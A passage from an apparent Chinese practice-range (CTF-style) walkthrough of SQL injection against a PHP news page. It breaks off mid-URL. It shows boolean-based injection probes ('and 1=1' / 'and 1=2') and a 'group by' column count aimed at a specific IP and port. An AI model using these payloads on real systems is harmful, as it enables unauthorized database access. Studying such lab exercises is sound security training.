-
首先进入靶场给的网址,发现是一个用户登录界面,这里就需要进行sql注入测试并MySQL数据库的信息收集
(1) 判定有没有sql注入可能。查看网页源代码
(2)发现存在变量id,那么进行测试:
http://124.70.22.208:47350/new_list.php?id=1 and 1=1 正常页面
http://124.70.22.208:47350/new_list.php?id=1 and 1=2(随便输也行)网页报错
可能存在sql注入漏洞
(3) 进行信息收集
- group by 1/2/3/... 查看表的列数,5 报错,说明表中有4列
http://124.70.22.208:47350/new_list.